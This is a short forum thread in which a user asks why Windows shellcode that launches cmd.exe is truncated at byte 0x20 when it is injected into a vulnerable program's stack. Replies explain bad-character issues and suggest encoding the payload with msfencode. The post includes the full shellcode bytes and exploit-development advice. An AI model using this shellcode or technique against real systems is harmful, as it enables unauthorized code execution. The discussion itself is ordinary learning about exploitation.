Why is my shellcode is truncated after \x20 opcode, when it is copied by string to stack on a second vulnerable program?
--cmd.exe-- char shell[]= "\xc7\x44\x24\x0c\x65\x78\x65\x20" ← only this line is put in stack, though hv a enough space "\xc7\x44\x24\x08\x63\x6d\x64\x2e" "\x31\xc0" "\x89\x44\x24\x04" "\x8d\x44\x24\x08" "\x89\x04\x24" "\x8d\x05\xad\x23\x86\x7c" "\xff\xd0"; --end shell--
On
My theory is that things like quote, space, null, etc are being interpreted by the windows shell rather than being sent through. You could escape it somehow, but I think it's easier to just encode the shellcode. So try metasploit's msfencode utility to avoid those opcodes altogether. I know null (/x00), space (/x20) and quote (/x22) can't be passed directly, but I suppose that there are other opcodes that can't be passed as well.
That's my solution, but does anyone know of any other ones that are better?
Are you passing this shellcode as a command-line argument? In that case, take a look at the ASCII code for 0x20 ;)